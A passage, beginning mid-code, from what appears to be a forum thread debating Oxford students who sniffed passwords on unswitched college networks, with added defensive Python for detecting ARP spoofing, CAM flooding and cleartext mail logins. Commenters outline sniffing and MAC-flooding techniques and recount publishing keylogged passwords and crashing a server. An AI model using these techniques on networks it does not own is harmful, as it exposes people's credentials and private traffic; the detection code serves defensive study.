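    claims: dict = field(default_factory=lambda: defaultdict(set))    # mac -> {ips claimed}
    alerts: list = field(default_factory=list)

    def observe(self, r: ArpReply) -> None:
        mac = r.sender_mac.lower()
        self.claims[mac].add(r.sender_ip)
        known = self.bindings.get(r.sender_ip)
        if known is None:
            self.bindings[r.sender_ip] = mac          # first sighting: learn it
        elif known != mac:
            # Another station now answers for an address already bound to a
            # different MAC.  Record it and follow the new claim so a later
            # flip back to the real owner is reported as well.
            self.alerts.append(
                f"t={r.ts:.1f}s {r.sender_ip} moved from {known} to {mac}")
            self.bindings[r.sender_ip] = mac

    def multi_ip_macs(self, threshold: int = 2) -> dict:
        """MACs that have claimed `threshold` or more distinct IPs.

        A poisoner impersonating the gateway to several victims shows up
        here; so does a router doing proxy ARP, so the list needs review."""
        return {m: sorted(ips) for m, ips in self.claims.items()
                if len(ips) >= threshold}


# Constructed capture: a gateway and two workstations, then a third station
# that starts answering for both the gateway and one workstation.
SAMPLE_REPLIES = [
    ArpReply(0.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(0.5, "10.0.0.20", "aa:aa:aa:aa:aa:20"),
    ArpReply(1.0, "10.0.0.21", "aa:aa:aa:aa:aa:21"),
    ArpReply(30.0, "10.0.0.1", "cc:cc:cc:cc:cc:99"),
    ArpReply(30.1, "10.0.0.20", "cc:cc:cc:cc:cc:99"),
    ArpReply(31.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
]


def run_demo(replies=SAMPLE_REPLIES):
    """Feed the sample capture through the monitor; return (alerts, suspects)."""
    mon = ArpMonitor()
    for r in replies:
        mon.observe(r)
    return mon.alerts, mon.multi_ip_macs()


if __name__ == "__main__":
    alerts, suspects = run_demo()
    for a in alerts:
        print("ALERT", a)
    for mac, ips in suspects.items():
        print("REVIEW", mac, "answers for", ", ".join(ips))
```

The binding-change alerts are the actionable signal; the multi-IP report needs a human, because a router doing proxy ARP legitimately answers for many addresses, while a single workstation answering for the gateway and a neighbour is exactly the pattern this thread describes.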
Good security is based upon reality and common sense. Common sense is a function of having common knowledge.
Just another case of glaringly unthought-out actions of script-tards. Anybody's dead grandmother can download a prog that sniffs or bypasses unguarded networks, especially if you have some kind of inside access in the first place. Give me a break. These guys are probably happy they got their 15 minutes of fame.
The Oxford student newspaper guys are angling to get a nice job on Fleet street after graduation, and are trying to come up with attention getting scoops. If their real intention was to help the network sysadmins, they should have brought this up privately (since the article doesn't mention it, I assume they didn't.)
Instead, they went to the front page. I wonder why they didn't stop to check with the Uni? Perhaps they were afraid that locking down the network would have prevented their scoop?
If you want to class these guys as do-gooding whistle-blowers, it's a tough task. Should they be punished? Yes. What if, in order to prove their point, they went in and read your e-mail after hacking your account? Or their off-the-shelf hack-kit contained malware that trashed your directories? Still keen on this kind of "journalism"?
They could, perhaps, have avoided problems and gotten their scoop, by having a few users consent to being hacked as a demonstration -- if, of course, the hacking was just a packet sniffer.
Make mental note never to enroll in Oxford.
Many modern CCTV systems offer the ability to zoom in and out, do various manipulations to the image quality (brightness, etc), and the more advanced cameras will also pan/tilt.
Trust me, I know. I've "discovered" our high school's CCTV system. It's neato. You can go from a camera near the ceiling in the cafeteria and zoom in to see the words on any student's papers at the lunch tables.
Just a thought. Call the entire matter a security audit. Bill for 1 pound.
Lets the university know that their only interest was in determining the university's ability to safeguard critical data, some of which happens to be their own.
After all, it's worth finding out for yourself if a criminal can break into your university's computer, isn't it? I mean, you could ask the university, but could you trust their answer if it wasn't "Well, we're probably vulnerable"?
It was later recorded by the university database that not only did they promptly pay the fine, they _overpaid_ by almost 2000 pounds. Of course, a refund was issued instantly.
Couldn't figure out why they were snickering though?
Along most coastlines, cliffs are not fenced.
What do you suppose we should do to people who try to prove that cliffs are dangerous by jumping off them? Assuming they survive?
Of course if there are lots of tourists visiting a particular cliff, then, these days, they do fence it.
Hence you could fence the computer science/info tech studies cliffs, but you could probably get away with leaving alone the accounting and psychology studies cliffs. So long as none of those student/tourists bring any CS/IT students/tourists...
Maybe the cliff metaphor is limited. Perhaps a closer one is that most of the office blocks around my town do not have bollards around the floor to ceiling windows on the ground floor. However, I sure as hell am NOT going to drive a truck through any of these windows to prove how insecure they are.
"A major security flaw was found in email today. Your email client may be leaking your password out onto the internet for hackers to see. Users should change their password on a weekly basis to protect themselves. People are also being told that they should stop using the words 'Love, Secret, Sex, and God' as their passwords. More at 11."
Go not unto /. for advice, for you will be told both yea and nay (but have nothing to do with the question)
Well, fiddling around in our lab comps, having nothing better to do, I did a find for files containing a weird substring from my password and to my lasting surprise found that one of the resulting files was a keylog. I saved the keylog and googled for the symptoms, found out what keylogger it was and removed it. I went to the central comp lab and changed all my passwords immediately and then told the best of my friends about it. It was a pretty big file full of keystrokes. We decided to look into the logs and came up with a list of lots of usernames and passwords in about a month's time...
Then we put up a notice asking everyone to change their password and a week after that we put up the list of usernames and passwords on the student wall magazine. Now, a lot of passwords were funny in themselves... Some were laughably trivial.. others told you what/who the chap perhaps thinks about the most... so it was all in all a funny article that we got.
Of course a lot of lab users did raise privacy issues. They especially seemed to mind that one month delay in informing them about the keylog. We never informed the institute because all that would have achieved is loss of freedom and stricter rules and usage policies.
Someone did complain after the article came out and we were let off with a warning from the institute. Also, we never came to know who installed the keylogger.
Well considering the number of people we got angry, I think we should have rather told the authorities but then the same people would be angry about that since it would definitely result in a significant loss of freedom.
You don't have a right to try and break in to places you do business at. Try it if you like, try and break in to your bank, but don't bitch when the cops haul you off to jail.
If they suspect a problem, they need to talk to the school about it and get permission. Just running off and doing it isn't acceptable.
You are free to test the security of things YOU OWN. You can break in to your house, you can hack your own computer. You can break the window of your own car. However you can't do any of those things to someone's property you just happen to use. Just because you have an account on a system I own doesn't give you permission to hack it. Just because I'm storing your bicycle for you doesn't give you permission to break in to my garage.
Look, I'll even entertain an argument that the law should be changed to make it legal, though I disagree, but you can't claim this isn't what the law is. Hence, they didn't have a right since they were breaking the law.
This was the first email I got when I decided to go the route of notifying them directly rather than publishing my findings: And this was my subsequent response: Which finally resulted in this (I guess it was escalated): I never heard back, but about three months later it was finally fixed. THREE MONTHS. Sometimes a little fire like an article is necessary to get bureaucracies moving.
I disagree with you here:
;-)
1. break into your house to show you how easy it is. It will really help you out in the long run, and you should thank me.
I see a lot of value in this. I lately saw a TV program that showed how easy it is to break into a normal (let's say un-patched) house. I take it seriously now, as I previously felt secure.
2. show the pilot on the next flight I'm on how easy it is to get a gun through airport security
Applies to the logic on point 1. If you can show this to be true, we all will be much better off.
3. show the Secret Service (hey, this is sarcasm. I don't need you guys to visit) how easy it is to jump the fence at the White House and run across the lawn
Yes, but show me how you can do this undetected and potentially kill the president? (I am not daring anyone to do this, nor implying that I would want to kill anyone!)
4. stick up the local bank to show them how bad their security is. I could write a really good article on that. Obviously I would give them their money back, so there isn't any harm in that. Right?
Sure, again I would love to see how you do that, as it is MY money I keep in the bank, because I think it is secure. Prove that it isn't and I will make sure my bank upgrades their security.
They got caught way too easily? As far as I understood they published their findings... that does not amount to being caught in my world...
I believe journalism has to cross the boundaries of ethics once in a while to maintain our freedom. If anything they wrote was a lie, that would be different, but they did fact-checking!
I don't desire for them to be punished, but I am capable of observing, and performing some simple Cartesian logic, so I ask myself - what were they thinking? Why would they want to publish this data in the newspaper that those other than the property owners could have easy access to the property? I don't really see what is to be gained from that by anyone - not them, not the property-owners, and not the general public. I could really care less if it easy for someone to use property that someone else claims is "their" property.
I remember on the old GNU machines, Richard Stallman's username was rms, and his password was rms as well. People used to hop around talking about that, how great they were for having "guessed" it and how supposedly "insecure" his account was, but I think they missed the whole point, and the much bigger picture.
This news was published over a month ago; I'm surprised it took so long to reach /.
Obviously, now. Beforehand, how could they have shown it?
White-hat my ass, they didn't ask for permission to crack the system first; they did it, THEN told them they did it, how easy it was and oh yeah, it was for altruistic purposes.
I hate to disturb your dream here, but asking permission might have made life difficult. The point of the exercise was that anyone could do it, not anyone being watched closely. It's impossible for Oxford to closely watch everyone.
Sure, it was done altruistically. People with different motivation have been and continue to do the same things. They reported the problems they noticed so that other students would know what not to trust on campus.
We shall see what happens to them.
Friends don't help friends install M$ junk.
I do IT part time for one of the colleges.
The story in the Oxford Student was partly right, in that since much of the network is on hubs and not switches, the students found they could read unsecured traffic. The students happen to be at a college where very little of the traffic is switched. But in almost every other respect, the story is over-hyped rubbish. They cannot get "anyone's" email password, which is what they claim.
So stop-press: AOL and email over non-switched networks is not secure. Great work guys.
Universities work very much on a model of trust. If they can access from inside the LAN then I'm not surprised they can penetrate with minimal problems. The main defense the University has is that it can stomp on anyone that commits any kind of abuse. Back before the Internet was a free for all (*cough*AOL*cough*) email and Usenet were spam and abuse free. This is because any student that tried it got chewed out by the University and often their accounts suspended.
It's fun to be free and explore. Personally I think their punishment should be that if they think their security is so bad they should be made to secure the network. Educational and constructive at the same time.
Phillip.
Ahh, but most people know that their houses are not secure and take further steps. Valuables and sensitive information is hidden or placed in a safe or safe deposit box. Most people do not know how insecure their M$ crap is.
This isn't a matter up for debate, it's the law
Laws should follow morals, not the other way around. Most computer laws are poorly crafted and are mostly protection for crappy software makers. It would be better for laws to do what they say and protect who they should.
What I find really scary is the feeble "we bought cheap systems, we can't secure it" excuses the systems admins are giving.
If they had used free software it would have been pretty secure out of the box (or whatever the equivalent is for downloading).
Most of the places I have worked recently are using the famously secure and "trusted" software from "honest" Bill Gates, and they have reasonably secure networks; it just takes some actual admin from the sysadmins.
What software are they using that stores passwords in plain text? In the 21st century? This is just plain negligent; I think the students involved should pursue the college through the Data Protection Act. In the UK anyone holding somebody else's personal information on their computer system has a duty to secure that data and prevent access from unauthorised users. Clearly asking the student body to "please obey the rules and not look" falls short of "reasonable measures to protect".
Old COBOL programmers never die. They just code in C.
It's better, if they are to be punished, for them to have made their point.
It's no secret that most university networks are Swiss cheese as far as security goes. Normally it's because they hire students at cut-rate wages to maintain the network. Most students' personal PCs are absolute spyware/virus/mass mailer heaven. I have done many a cleanup job on laptops that were once connected to campus networks. I've also talked to friends going to different schools about infected lab computers and switches saturated with spam traffic. In an environment like that, it's no surprise the servers never get patched. It's an accident waiting to happen.
The other thing I get from this article is that it's a good idea to expect to get nailed to the wall by your balls if you break into a system even if your cause is noble. It seems that most people with authoritah are more worried about how embarrassing the situation is than actually getting the problem fixed. So they want to nail the guys who made them look like a doof. I'll tell you this, if I ever find a vulnerability in any system I'm keeping it to myself.
-R
It looks to me like they installed a sniffer on their machine, and sat and watched all the traffic pass by - recording any passwords and network data. Easily done. No big deal. ... ATM machines found to be insecure after we stand next to one, and watch people key in their code ... telephone banking found to be insecure after we stand next to someone using it and tape record everything they say?
What's next?
I thought Oxford students were supposed to be smart?
That's a good university, I'm sorry that they decided to move to compulsory computer administration. Scanning software for email is a big deal. Do I really want your half baked program deciding what mail I get? No. Turning on and off software on other people's machines is bad. Do I want you using my machine to block ports? No. Of course, I don't need that kind of thing, nor would your nasty little tools work, because I don't run Winblows.
There's a big difference between making a tool available and giving people a choice to use it and what you advocated above. I'd consider my email and computer owned by you if you did those things to me.
Moreover, I know that the steps you mention don't really do anything for security. All of those bandaids are nothing more than an inconvenience to the end user. The cracker, as has been so amply demonstrated in the last few months, goes on as before. Faculty at your University might understand better than you think that they will get little in return for your efforts and theirs.
I work at the university, and the essential facts of this case have been reasonably well known here since it happened several weeks ago.
:-) but suspending them, essentially for having no common sense, is a bit harsh. It would have been straightforward for them to obtain most of the facts they needed for the story without breaking the law and violating people's privacy (restrict the packet sniffer to specific computers where the owners had agreed in advance), but they chose not to or failed to think about it or do some basic research first.
The structure of the university means that the many parts of the university (the 'colleges') have independently run networks, all connected to the same university backbone. Many college networks aren't switched, either because of lack of time or resources, or because there's not all that much point - if you know what you're doing you can MAC flood the switches anyway from any port that is set to learn new computers (pretty much essential in libraries).
What the 'reporters' did was simply to run a packet sniffer on various unswitched networks. I think they managed to watch some CCTV coverage, read someone random's MSN conversation, and possibly pick up a few passwords. They then went and told the people they'd sniffed what they'd done, and wrote a rather over-sensationalised article about the security flaws.
This kind of thing (someone noticing the network is insecure and making a really big deal of it) happens every few years in Oxford, and usually it doesn't generate quite this much publicity. The university has gradually been developing a tougher line on computer misuse, which may explain their desire to throw the book at the journalists.
They are threatened with a 500 pound fine and being suspended for a year. Personally I think the fine is justified (the university could use it to buy some more switches
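The post mentions that a switch can be turned back into a hub by MAC flooding from any port that is set to learn new addresses. The counter-measure on the switch itself is to cap the number of learned MACs per port (port security); where that is not available, a flood is at least easy to detect, because an access port that normally sources one or two MACs suddenly sources hundreds within seconds. The sliding-window detector below is an added example written for this page, not code from the thread or from the university; port names, timestamps and MAC addresses are constructed sample data, and a real feed would come from a mirror port or flow records.

```python
"""Sliding-window detector for CAM table flooding (added example; not from
the thread).  A switch learns one MAC per station on an access port, so a
port that suddenly sources hundreds of distinct MACs is being flooded to
overflow the CAM table and turn the switch into a hub.  Frames below are
constructed sample data; a real feed would come from a mirror port or sFlow."""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float      # seconds since capture start (constructed)
    port: str      # switch port the frame arrived on (constructed names)
    src_mac: str


class CamFloodMonitor:
    def __init__(self, window_s: float = 10.0, max_macs: int = 8):
        self.window_s = window_s
        self.max_macs = max_macs            # allowed distinct MACs per port
        self._recent = defaultdict(deque)   # port -> deque of (ts, mac)
        self.alerts = []
        self._alerted = set()

    def observe(self, f: Frame) -> int:
        """Record a frame; return the distinct-MAC count for its port."""
        q = self._recent[f.port]
        q.append((f.ts, f.src_mac.lower()))
        # Drop entries older than the window so the count reflects a burst,
        # not the whole history of the port.
        while q and q[0][0] < f.ts - self.window_s:
            q.popleft()
        distinct = len({m for _, m in q})
        if distinct > self.max_macs and f.port not in self._alerted:
            self._alerted.add(f.port)      # one alert per port per flood
            self.alerts.append(
                f"t={f.ts:.1f}s port {f.port}: {distinct} source MACs in "
                f"{self.window_s:.0f}s (limit {self.max_macs})")
        return distinct


def constructed_frames() -> list:
    """Constructed capture: one normal access port and one flooded port."""
    frames = []
    # Normal access port: a desktop and its docking station, chatty but steady.
    for i in range(40):
        mac = "aa:aa:aa:aa:aa:01" if i % 2 else "aa:aa:aa:aa:aa:02"
        frames.append(Frame(i * 0.5, "Gi1/0/7", mac))
    # Flooded port: 300 different source MACs within two seconds.
    for i in range(300):
        frames.append(Frame(5.0 + i / 150, "Gi1/0/12",
                            f"02:00:00:00:{i // 256:02x}:{i % 256:02x}"))
    return sorted(frames, key=lambda f: f.ts)


def run_demo(frames=None):
    """Run the monitor over the frames; return (alerts, peak distinct MACs per port)."""
    mon = CamFloodMonitor()
    peak = defaultdict(int)
    for f in (frames if frames is not None else constructed_frames()):
        peak[f.port] = max(peak[f.port], mon.observe(f))
    return mon.alerts, dict(peak)


if __name__ == "__main__":
    alerts, peak = run_demo()
    for a in alerts:
        print("ALERT", a)
    print("peak distinct MACs per port:", peak)
```

The limit of 8 is deliberately generous for a single-station port; a port feeding a lab hub or an uplink needs a higher threshold or should be excluded, otherwise the monitor alerts on normal traffic and gets ignored.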
Good luck trying to run to the White House from the fence -- the handful of snipers that hang out on the roof are permitted to kill anyone they feel poses a threat. Better hope it doesn't look like you've got a bomb under your shirt.
So the people who exposed the negligence of the university authorities, thereby in the long run improving security, are to be punished. The pompous stuffed shirts responsible for the insecure network must obviously be protected from embarrassment at any cost.
The privacy of the people whose email passwords can be retrieved so easily (BTW why does the system hold unencrypted passwords anyway?) doesn't matter to anybody important.
And I quote: "If everybody broke into a network would it still be unlawful? [?]" In a democratic society, YES: if everybody is doing something it shouldn't be against the law in the first place because the "majority", i.e. "everybody", is doing it. But democracy may work differently depending on who you are and where you are at; as proof, watch this comment get modded up as I whore the karma as Anonymous Coward :)
Looks to me like these students caught the school with their pants down this time and now the school is crying to the police because 2 students are apparently smarter than the entire school's network security system. If you ask me these students should be given high marks for this exposition rather than the sort of (knee-jerk) reaction they are currently receiving.
to the students i say, nice work!
to the school i say, grow up and fix the hole.
In other news, small fish are arrested for swimming through a rather large dragnet that reportedly had holes in it.
Yes, there are most likely sloppy admins / clueless IT people / etc. involved and they deserve the spanking that comes their way. That, however, doesn't excuse these men. They are (like myself) young and lacking in experience (read: stupid). But it doesn't take more than a second's worth of thought to realize that what they did was an act of monumental idiocy and recklessness. Did they attempt to contact Oxford's IT? Articles seem to imply no. Did they attempt to go to whatever Oxford's equivalent of a dean is? Again, the articles imply no. Instead they exposed Oxford's network to even more danger by announcing the flaws before their IT people had a chance to fix things. This isn't at all like a parent seeing an unlocked medicine cabinet in a daycare facility and then trying to tell the relevant people about it; this is more like a parent noticing an unlocked cabinet in a daycare facility and then announcing to all the kids how to get into it.
it's not fair, etc, etc, etc
What, now they have started teaching hacking in school? Good goin'!
Chris,
Disclaimer: These are my own views, and do not necessarily represent the views of either the college I work for or Oxford University. Right, that's out of the way, then.
I work for the college that one of these students attends. So far there's been very little said by the IT staff on this matter; it's all been done by the official channels of the university. But this seems to be a good place to set the record straight on a few things.
These students didn't hack anything. All they did was sniff some TCP/IP traffic. That they could only do because it was the last hub left to upgrade in college. I'm fairly certain they wouldn't have had the intelligence to bypass a proper switch, but even then, it's hardly a massive security failure. None of the college's administration systems were compromised in any way. None of the student servers were compromised. The emails and passwords they compromised were not the official university ones, and if they were, it is because the email clients were not configured properly. The new webmail interface (unpopular for a reason that's beyond me) is through https: and therefore secure. They only got these passwords at all because email passwords under POP, as well as IMAP if you don't use SSL, are transmitted in clear text, people. Just like MSN Messenger and the internet. Somehow we are being held accountable for how the internet works. Maybe it's because Tim Berners-Lee attended here.
There is no real problem here, except the issue of user awareness. And that was in no way raised by the article these two hacks wrote; rather, people are more paranoid (not a bad thing in itself) yet further misled in their understanding of the university networks. It is not journalism to create a story. It is journalism to report a story in a fair and unbiased manner.
Out of the article printed by these two in the Oxford Mail, the various editorials in both the above and the other Oxford Student paper, the Guardian and the BBC, the only unbiased report I've seen is from the BBC. And even then it's because you get the impression they're too lazy to get involved ;op
No, that's not journalism. That's scare-mongering.
I agree with those people who say this should not have gone to the police - but by that time it was being handled by people who didn't understand the technicalities of what these people did.
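The IT officer's point is that POP3 and IMAP clients send the password in clear text unless the session is TLS from the first byte (ports 995/993) or is upgraded with STLS/STARTTLS before authentication, while HTTPS webmail is not exposed. A network team can turn that into an inventory of clients that still need reconfiguring by auditing the client-to-server commands of each mail session for a credential command sent before any TLS upgrade, reporting the client but never the credential. The code below is an added example written for this page, not from the thread or any product; the sessions are constructed sample data, and in practice the visible command lines would come from a capture taken on the mail server side.

```python
"""Audit of mail sessions for cleartext authentication (added example; not
from the thread).  POP3 and IMAP carry USER/PASS and LOGIN in the clear
unless the session is TLS-wrapped (ports 995/993) or upgraded with
STLS/STARTTLS first.  The audit reports *which* clients still do this so
they can be reconfigured, and never records the credential itself.
Sessions below are constructed sample data."""
from dataclasses import dataclass

IMPLICIT_TLS_PORTS = {995: "POP3S", 993: "IMAPS"}   # encrypted from the start
PLAIN_PORTS = {110: "POP3", 143: "IMAP"}            # cleartext until upgraded
UPGRADE_CMD = {"POP3": "STLS", "IMAP": "STARTTLS"}
# SASL mechanisms that transmit the password itself (not a challenge
# response); before the TLS upgrade they are as exposed as USER/PASS.
PLAINTEXT_MECHS = {"PLAIN", "LOGIN"}


@dataclass(frozen=True)
class Session:
    client: str       # client address (constructed)
    dst_port: int
    commands: tuple   # client-to-server lines visible on the wire, in order


def _parse(proto: str, line: str):
    """Return (verb, first argument); IMAP lines carry a tag first ("a001 LOGIN ...")."""
    parts = line.split()
    if proto == "IMAP":
        parts = parts[1:]
    verb = parts[0].upper() if parts else ""
    arg = parts[1].upper() if len(parts) > 1 else ""
    return verb, arg


def _carries_credential(proto: str, verb: str, arg: str) -> bool:
    if proto == "POP3":
        return verb in ("USER", "PASS") or (verb == "AUTH" and arg in PLAINTEXT_MECHS)
    return verb == "LOGIN" or (verb == "AUTHENTICATE" and arg in PLAINTEXT_MECHS)


def audit_session(s: Session):
    """Return a finding dict if the session authenticated in the clear, else None."""
    if s.dst_port in IMPLICIT_TLS_PORTS:
        return None                      # TLS from the first byte; nothing visible
    proto = PLAIN_PORTS.get(s.dst_port)
    if proto is None:
        return None                      # not a mail port; out of scope
    for line in s.commands:
        verb, arg = _parse(proto, line)
        if verb == UPGRADE_CMD[proto]:
            return None                  # everything after the upgrade is encrypted
        if _carries_credential(proto, verb, arg):
            # Report the fact, not the secret: the rest of the line is dropped.
            return {"client": s.client, "proto": proto,
                    "port": s.dst_port, "command": verb}
    return None


def audit(sessions):
    """Findings for every session that sent a credential before TLS."""
    return [f for f in map(audit_session, sessions) if f is not None]


# Constructed sessions (the passwords are placeholders, not real secrets).
SAMPLE_SESSIONS = (
    Session("10.0.0.20", 110, ("USER alice", "PASS not-a-real-secret", "STAT", "QUIT")),
    Session("10.0.0.21", 143, ("a001 STARTTLS",)),                   # rest is encrypted
    Session("10.0.0.22", 143, ("a001 LOGIN bob not-a-real-secret",)),
    Session("10.0.0.23", 995, ("<TLS record>",)),                    # POP3S, nothing readable
    Session("10.0.0.24", 110, ("STLS",)),                            # upgraded before auth
    Session("10.0.0.25", 143, ("a001 CAPABILITY", "a002 AUTHENTICATE PLAIN")),
)


if __name__ == "__main__":
    for f in audit(SAMPLE_SESSIONS):
        print(f"{f['client']} sent {f['proto']} {f['command']} in the clear on port {f['port']}")
```

The output is a list of clients to reconfigure (or of server ports to close once the clients are moved), which is the practical follow-up to the observation in the post; the user-awareness problem it describes is solved by making the secure configuration the only one the server accepts, not by asking people not to look.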
The only thing I think that is dumb on the administration's part is having the Closed Circuit Televisions controlled via the internal network, that shit should be on a totally different network
Yeah, exactly. That wasn't us, btw. But even so, I'd like to point out that being able to access a security camera in a public area is not exactly a breach of privacy. Just a bit dumb of whoever put it in. Probably someone going over the head of the IT admin, if I know Oxford...
Somebody fire this person (re: the comments by IT officer A)
It's better to stay quiet and be suspected a fool than open one's mouth and remove all doubt.
These were members of the legitimate press, who in the course of their duties as members of a free press, alerted a population about a situation where the authorities who they trust to provide security have failed in carrying out their responsibilities.
Uh.. I don't see it as the duties of the free press to break the law in order to create a story - or even to report one. As for the failing of responsibilities - it should be obvious by now that this hasn't happened.
Have you heard of Whistleblowing
Have you heard of Shit-stirring?
That's true, but what about when an intranet is left open and someone, exploring the network, stumbles upon it?
My friend's wife once found the answers to all the homework and exams during a class on computer administration, while viewing the intranet from her workstation. The files were not password protected and there was nothing indicating that this was supposed to be private (before opening it).
She realized this wasn't right, and told the teacher. Unfortunately, the professor was not pleased, and the school tried to expel her on grounds of illegally cracking into the network! In the end, she was forced to drop the class even though my friend's wife knew more than the teacher himself! (I think the college's lawyers realized they could be sued if they expelled her.)
She wasn't the only one. A while back, I heard about a case where the New York Times sued a hacker when he found a security hole in their network and told them about it (and didn't do anything else). In both cases nothing was damaged at all, nothing was really seen and nobody was hurt. It's like someone notices that your back door's lock is broken, sends you a letter about it, and you sue them for trespassing.
What I'm saying is that we need some kind of legal protection for this kind of accidental "hacking".
It is impossible to enjoy idling thoroughly unless one has plenty of work to do.
- Jerome Klapka Jerome
So the Proctors enquire of the editor as to the veracity of that claim. Even Oxford students could spot that flaw in your plan.
The thing is can you really expect any university with a decent CS program (and therefore a large concentration of possible hackers) to be able to really secure their networks against their own students without spending a ton of money? Just by being a student you already have a valid username/password to start with which makes it pretty damn easy. Most universities rely on the hope that students will have enough decency to not hack the network.
I'm not saying I think they should be charged with anything but they should have remembered these old words of wisdom: Don't shit where you eat.
show the Secret Service (hey, this is sarcasm. I don't need you guys to visit) how easy it is to jump the fence at the White House and run across the lawn
Yes, but show me how you can do this undetected and potentially kill the president? (I am not daring anyone to do this, nor implying that I would want to kill anyone! ;-)
Alright, now somebody do this and shoot the president with a water gun. That would be soooooooooo cooooooooooool. Seriously. ;) Or a little (obviously fake) gun that puts out a flag that says "Bang". Probably better, no actual contact with the president, just show them you can do it. Nothing really threatening, don't do it with a gun that even remotely looks like it might shoot bullets (you'll get shot). In fact, you might just want to say "bang" and possibly add "this is a prank to show how insecure the system is in an attempt to help to secure the president better, and I have a toy pistol that will put out a flag that says 'bang' and it would be really funny and we'll all get a good laugh, but I don't want any of the SS guys to think I'm actually shooting the president. May I?"
So, yeah, don't get shot, and don't hurt anybody, and don't actually break any laws doing it. ;)
Like what I said? You might like my music
Everyone seems to be making a big fuss over this which isn't such a big deal. Oxford computer society's take on it was this. What they did wasn't anything fancy, it was just bummed up for the paper because exciting things don't happen in Oxford very often. I've no idea why the Guardian and the Beeb are reporting this now, 1.5 months after the OxStu's headline, perhaps it's just a slow news day or something. This is all getting blown out of all proportion; at the time I thought what a big pile of bollocks and now this is just ridiculous.
From the BBC story:
"Two students from Oxford University are facing disciplinary action after hacking into the university's computer."
I don't know, these uni sysadmins don't care.
I crashed my uni server with code posted on Slashdot the week before last; they are still running 2.4.22.
Actually, if everyone does a particular thing, sometimes it becomes legal.
If you don't have 'no trespassing' signs on your yard and kids walk through it every day for, say about 7 years (this is the usual) you can actually lose the right to stop them. The area becomes public domain for a particular purpose.
It would be interesting to see this applied to a network.
(IANAL, btw)
___
It's the end of my comment as I know it and I feel fine.
I'm sorry, but being a member of the 'press' (In this case reporting for a university paper) does not give you the right to break the law. You're confusing it with the right to free speech.
They were well within their rights to report on the situation, but they did not have the right to break the law. They have been prosecuted for the latter, not the former.
If you leave a car open here and someone else drives away with it, then you are guilty of a "misdemeanor" over here (de). Of course it still is not legal to take the car.
A similar rule should apply with regard to networks that are supposed to be secure but in fact are open (at least to a certain degree, to be defined).
This, in cases like the ones you describe, would balance the situation (OTOH, if one considers the average knowledge of local judges on IT matters - alas - some have a hard time sending an e-mail).
CC.
TaijiQuan (Huang, 5 loosenings)
Well, NYFD did act. After noticing that after the first attempt to topple the WTC (26th Feb 1993), the police department successfully rescued some people via helicopter from the roof, they had to act.
Indeed, the fire departments' advice is to always flee downstairs, never upstairs. The NYPD's intervention was a dangerous interference in the fire department's work, and a re-occurrence of such a bold stunt had to be prevented at all costs.
The fire department rejected recommendations from police pilots that an area of the north tower's roof be kept clear for helicopter landings. The antennas were put back up. And mostly for security reasons, the Port Authority kept the two sets of heavy metal doors leading to the building's only roof exit tightly locked -- as they would be on the morning of Sept. 11, when they successfully kept the victims securely trapped in the towers, all the while police helicopters were hovering overhead, wondering why nobody fled to the roof...
I wonder how many other large 'internal' networks are open to the same issues!
I would bet on many - including my own at work.
Don't send passwords on the LAN in clear text - it's a bad idea(tm).
edukayshun, educayshun, edukayshun,,,
your data is at risk if you send it in plain text over the network...
They aren't even good script kiddies -- they got caught way too easily.
They were 'caught' because the newspaper had their names at the bottom of the article.
Firstly, please let me clarify a few points about the article and the way stuff is run at Oxford:
My understanding of what has probably happened is that one or more colleges have skimped on network hardware and not installed the recommended switched network equipment with MAC address protection.
Alternatively the students may have found a way to defeat the security on the switch they're connected to that allowed them to mirror other ports' traffic down their port.
Although they did sniff passwords for a University provided e-mail service, it seems that everything they did was within a college network.
To say that the University network was hacked, as both the /. article and the student rag suggests is not accurate and vastly inflates the scale of what these students "achieved".
Alnitak - Oxford graduate and ex-staffer.
How is all this significantly different from impersonating a mental patient or investigating meat packing plants?
You think they should call ahead and clear everything, so they see the fine state of the mental care facilities, and how nice clean and sanitary meat packing is? "Sure, let me set up this shell for you to try and hax out of..."
PS., if you fail the reference, you're missing out on what defines great investigative journalism, as these are specific examples from "recent" US history.
university campuses tend to almost have their own legal systems
But with the entire event being isolated to a university campus...
There is no single campus at Oxford, only a collection of Colleges, Libraries and Faculties.
The policing of Oxford students is dealt with mainly by the Colleges and the Proctors. The Proctors can be quite fierce if they fail to see the funny side. They are also quite old fashioned - most students hope only to encounter them at ceremonial occasions when they'll be wearing gowns and funny hats. There are also the 'Bulldogs' who are basically the heavies for the Proctors and go round in bowler hats and used to chase the students out of pubs in the old days.
In this instance, the fact that the story was splashed on the front page of a newspaper with circulation throughout Oxford (rather than just within a campus) probably caused a lot of embarrassment. Added to which, I wouldn't be surprised if the Proctors have very little understanding of exactly what has been done or how. They will assume the worst. They probably just want to be seen to be taking the matter seriously and don't know exactly how serious it really is or what reaction is appropriate. In any case, rustication isn't so bad - you can come back to study once you've served your time away. They could have been 'sent down', in which case it'd be game over.
Yeah yeah.. permission and all that.
- Did they break anything? Delete a log? Probably not.
- Did they tell what they did? Disclose the flaws? Yes.
Can someone please hit this uni with a clue stick? Look at my ISP: xs4all.nl (granted, they are formed by a early 70's Dutch hacker group, so they grok security pretty well..)
xs4all gives out FREE accounts (for a year) to ANYONE who gains unauthorized access to their systems... and TELLS them about it. They will file police reports only if you DON'T tell...
"/Dread"
Back in the 1970's there was a kid in my junior high school who hacked the school's computer to see what he could do in a few hours.
As soon as he was done, he went to the office and turned over all his information on how he did it and what he was able to access.
You know what they did? They expelled him on the spot. And you think it's going to be a kinder more reasonable world 30 years later in a more socialistic country than here? Say what you will about the University, but these kids are street-stupid for even attempting something like this without some insider acknowledgement before hand.
"A monkey could do it with the right software."
As an unemployed Unix Administrator currently working in a Zoo to pay the rent I can put this to the test.
Situation:
Pentium 3 750mhz, Knoppix boot CD, unswitched network, plain text protocols running over network, 3 Columbus Lemur Monkeys.
Test 1: Monkey sat in front of screen and left to own devices.
Result 1: Neither monkey achieves much, taking no interest in the screen.
Test 2: Console opened, "ethereal" typed in as hint, monkey sat in front of screen.
Result 2 Again monkeys take little interest, monkey 3 does paw at the screen for a few minutes. Monkey 1 is distracted by small child waving icecream in its face, result for monkey 1 discarded.
Test 3: Ethereal opened, required options selected, bit of banana left on the enter key.
Result 3: All monkeys successfully grab the banana, triggering the enter key, and starting the packet sniffing session; in each case all plain text data over the network is recorded - SUCCESS!
So kids, as we've shown, a monkey is quite capable of doing this kind of hack. Now nobody is safe.
